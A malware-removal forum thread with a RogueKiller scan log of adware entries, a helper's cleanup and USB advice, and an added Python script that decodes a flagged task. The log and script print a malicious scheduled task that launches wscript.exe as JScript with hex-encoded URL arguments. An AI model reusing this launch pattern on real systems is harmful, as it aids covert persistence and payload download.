Blog : http://www.adlice.com

Operating System : Windows 10 (10.0.14393) 64 bits version
Started in : Normal mode
User : ghy [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Scan -- Date : 04/13/2017 20:26:10 (Duration : 00:41:52)

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 17 ¤¤¤
[PUP.Gen0] (X64) HKEY_CLASSES_ROOT\CLSID\{10ECCE17-29B5-4880-A8F5-EAD298611484} (C:\Program Files\Reimage\Reimage Repair\REI_Axcontrol.dll) -> Found
[PUP.Gen0] (X64) HKEY_CLASSES_ROOT\CLSID\{801B440B-1EE3-49B0-B05D-2AB076D4E8CB} (C:\Program Files\Reimage\Reimage Repair\REI_Axcontrol.dll) -> Found
[PUP.Gen1] (X64) HKEY_LOCAL_MACHINE\Software\Reimage -> Found
[PUP.DownloadAssistant] (X86) HKEY_LOCAL_MACHINE\Software\DVDVideoSoft -> Found
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\csastats -> Found
[PUP.DownloadAssistant] (X64) HKEY_USERS\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\DVDVideoSoft -> Found
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\OCS -> Found
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\ProductSetup -> Found
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\Reimage -> Found
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\csastats -> Found
[PUP.DownloadAssistant] (X86) HKEY_USERS\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\DVDVideoSoft -> Found
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\OCS -> Found
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\ProductSetup -> Found
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\Reimage -> Found
[PUP.Gen1] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Update service (C:\Program Files (x86)\Popcorn Time\Updater.exe) -> Found
[PUP.Gen1] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {00B8A13D-CCCB-469C-9A49-F0CEF71BF6BC} : v2.26|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\Program Files (x86)\Popcorn Time\Updater.exe|Name=Updater.exe| [-] -> Found
[PUP.Gen1] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {811A54C6-DF42-4378-872C-EFB4F8516A9C} : v2.26|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\Program Files (x86)\Popcorn Time\Updater.exe|Name=Updater.exe| [-] -> Found

¤¤¤ Tasks : 1 ¤¤¤
[Suspicious.Path|VT.Unknown] %WINDIR%\Tasks\Yahoo! Powered tadid.job -- C:\WINDOWS\system32\wscript.exe ("C:\ProgramData\{96FE539D-1CBC-D95B-9A7A-47190038CCD7}\fata.txt" "68747470733a2f2f7761676e672e636f6d" "433a5c50726f6772616d446174615c7b39364645353339442d314342432d443935422d394137412d3437313930303338434344377d5c736563696469" "433a5c50726f6772616d446174615c7b39364645353339442d314342432d443935422d394137412d3437313930303338434344377d5c736972616c6f6c" "//B" "//E:jscript" "--IsErIk" ) -> Found

¤¤¤ Files : 2 ¤¤¤
[PUP.FusionCore|PUP.Gen0][Folder] C:\Program Files (x86)\Common Files\DVDVideoSoft -> Found
[PUP.Gen1][Folder] C:\Program Files (x86)\Popcorn Time -> Found

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD3200BPVT-22JJ5T0 +++++
--- User ---
[MBR] 2b8c13c9fe7aa3fa87c1c94de6490a67
[BSP] f08be744cb9cd69f4160f0e70fe4ba66 : Empty|VT.Unknown MBR Code
Partition table:
0 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 2048 | Size: 400 MB
1 - [MAN-MOUNT] EFI system partition | Offset (sectors): 821248 | Size: 300 MB
2 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 1435648 | Size: 16 MB
3 - Basic data partition | Offset (sectors): 1697792 | Size: 288115 MB
4 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 593496064 | Size: 15452 MB
User = LL1 ... OK
User = LL2 ... OK
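
The scheduled task flagged in the RogueKiller log above runs wscript.exe against a .txt file and passes three hex-encoded arguments. As an added example (not part of the original thread and not code from RogueKiller or any other tool named here), this Python script parses that task entry, decodes the hex arguments, and lists why the entry deserves attention; the function names and the defanging step are assumptions made for illustration.

```python
import re

# Task entry copied verbatim from the RogueKiller log posted in this thread.
TASK_LINE = (
    r'[Suspicious.Path|VT.Unknown] %WINDIR%\Tasks\Yahoo! Powered tadid.job -- '
    r'C:\WINDOWS\system32\wscript.exe '
    r'("C:\ProgramData\{96FE539D-1CBC-D95B-9A7A-47190038CCD7}\fata.txt" '
    r'"68747470733a2f2f7761676e672e636f6d" '
    r'"433a5c50726f6772616d446174615c7b39364645353339442d314342432d443935422d394137412d3437313930303338434344377d5c736563696469" '
    r'"433a5c50726f6772616d446174615c7b39364645353339442d314342432d443935422d394137412d3437313930303338434344377d5c736972616c6f6c" '
    r'"//B" "//E:jscript" "--IsErIk" ) -> Found'
)

# [tags] <job file> -- <executable> ("arg" "arg" ...) -> <status>
TASK_RE = re.compile(
    r'^\[(?P<tags>[^\]]+)\]\s+(?P<job>.+?)\s+--\s+(?P<exe>.+?)\s+'
    r'\((?P<args>".*")\s*\)\s+->\s+(?P<status>\w+)$'
)
# Whole argument made of hex byte pairs, at least four bytes long.
HEX_RE = re.compile(r'(?:[0-9A-Fa-f]{2}){4,}')
SCRIPT_EXTENSIONS = ('.js', '.jse', '.vbs', '.vbe', '.wsf')


def decode_hex_arg(arg):
    """Return the printable ASCII text behind a hex-encoded argument, else None."""
    if not HEX_RE.fullmatch(arg):
        return None
    raw = bytes.fromhex(arg)
    if not all(0x20 <= b <= 0x7E for b in raw):
        return None
    return raw.decode('ascii')


def defang(text):
    """Rewrite a leading http/https as hxxp/hxxps so output is not clickable."""
    return re.sub(r'^http', 'hxxp', text, flags=re.IGNORECASE)


def triage_task(line):
    """Parse one RogueKiller task entry and explain what stands out in it."""
    m = TASK_RE.match(line.strip())
    if m is None:
        raise ValueError('not a RogueKiller task entry')
    args = re.findall(r'"([^"]*)"', m['args'])
    exe = m['exe'].rsplit('\\', 1)[-1].lower()
    decoded = [defang(t) for t in map(decode_hex_arg, args) if t is not None]

    reasons = []
    if exe in ('wscript.exe', 'cscript.exe'):
        reasons.append('task launches a Windows Script Host interpreter')
    script = args[0].lower() if args else ''
    engine = next((a[4:] for a in args if a.lower().startswith('//e:')), None)
    if engine and not script.endswith(SCRIPT_EXTENSIONS):
        reasons.append(f'//E:{engine} forces a script engine on a non-script file name')
    if any(a.lower() == '//b' for a in args):
        reasons.append('//B runs in batch mode, suppressing prompts and errors')
    if decoded:
        reasons.append('arguments are hex-encoded ASCII')
    if any(d.lower().startswith('hxxp') for d in decoded):
        reasons.append('a decoded argument is a URL')

    return {
        'tags': m['tags'].split('|'),
        'job': m['job'],
        'exe': exe,
        'args': args,
        'decoded': decoded,
        'reasons': reasons,
        'status': m['status'],
    }


if __name__ == '__main__':
    result = triage_task(TASK_LINE)
    print(result['job'], '->', result['exe'])
    for text in result['decoded']:
        print('  decoded argument:', text)
    for reason in result['reasons']:
        print('  note:', reason)
```
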


Offline Hoov

Re: [In Progress] Problems with computer
« Reply #5 on: April 13, 2017, 07:42:39 PM »
Go ahead and run AdwCleaner and RogueKiller again. Make sure to select all the entries it finds, and then in AdwCleaner hit the clean button. In RogueKiller click on the remove selected button. Reboot your computer and tell me if anything else has changed.

When was the last time you updated Malwarebytes and ran a scan?


Offline mommyto3furballs

Re: [In Progress] Problems with computer
« Reply #6 on: April 13, 2017, 07:54:59 PM »
yesterday but i can run it again tomorrow. i'm headed to bed shortly

Offline mommyto3furballs

Re: [In Progress] Problems with computer
« Reply #7 on: April 14, 2017, 06:19:19 AM »
ran the malwarebytes scan. only 2 items show up so cleaned up. i still can't use my usb port to connect my external drive to get my stuff off computer. any more suggestions before i cry?

Offline Hoov

Re: [In Progress] Problems with computer
« Reply #8 on: April 14, 2017, 09:33:41 AM »
We are just getting started. Before we move to hardware, how is the computer running?


Offline mommyto3furballs

Re: [In Progress] Problems with computer
« Reply #9 on: April 14, 2017, 09:52:19 AM »
Seems to be running good

Offline Hoov

Re: [In Progress] Problems with computer
« Reply #10 on: April 14, 2017, 10:26:19 AM »
Go to the Control Panel and then to the Device Manager and look at your hardware list. Tell me if there are any devices with a yellow exclamation mark or a red x. If there are, tell me what device has that mark next to it.


Offline mommyto3furballs

Re: [In Progress] Problems with computer
« Reply #11 on: April 15, 2017, 02:38:40 PM »
Nothing shows up with exclamation point or error. Was able to start burning files to cd-r again

Offline Hoov

Re: [In Progress] Problems with computer
« Reply #12 on: April 15, 2017, 06:55:22 PM »
How about your USB port? Is that the only USB port that you have?


Offline mommyto3furballs

Re: [In Progress] Problems with computer
« Reply #13 on: April 16, 2017, 05:32:35 AM »
There are 3 USB ports in the computer. 2 on one side and 1 on the other side. None seem to work. Beginning to wonder if the external hard drive died :(

Offline Hoov

Re: [In Progress] Problems with computer
« Reply #14 on: April 16, 2017, 08:14:24 AM »
Do you have a USB device you can plug into the computer, or another computer you can plug the drive into?
